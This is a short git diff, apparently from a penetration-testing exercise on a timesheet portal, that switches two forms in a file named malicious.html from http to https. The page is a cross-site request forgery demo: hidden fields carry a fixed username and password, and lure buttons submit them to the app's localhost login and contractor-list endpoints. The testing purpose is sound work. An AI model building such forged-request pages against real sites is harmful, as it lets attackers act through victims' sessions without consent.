PenTest-Session-Fix

--- a/src/main/java/com/admiral/tsp/timesheetportal/web/forms/malicious/malicious.html
+++ b/src/main/java/com/admiral/tsp/timesheetportal/web/forms/malicious/malicious.html
@@ -9,7 +9,7 @@
             <h1>Cross Site Login Request</h1>
 
             <div>
-                <form action="http://localhost:8081/contractorList/5" method="get" name="CSRFreq">
+                <form action="https://localhost:8081/contractorList/5" method="get" name="CSRFreq">
                     <input type="hidden" name="username" value="prankD" />
                     <input type="hidden" name="password" value="12345" />
                     <button type="submit"> Show your managers Here </button>
@@ -17,7 +17,7 @@
             </div>
 
             <div>
-                <form action="http://localhost:8081/login" method="post" name="CSRFLogin">
+                <form action="https://localhost:8081/login" method="post" name="CSRFLogin">
                     <input type="hidden" name="username" value="prankD" />
                     <input type="hidden" name="password" value="12345" />
                     <button type="submit"> Submit Here </button>
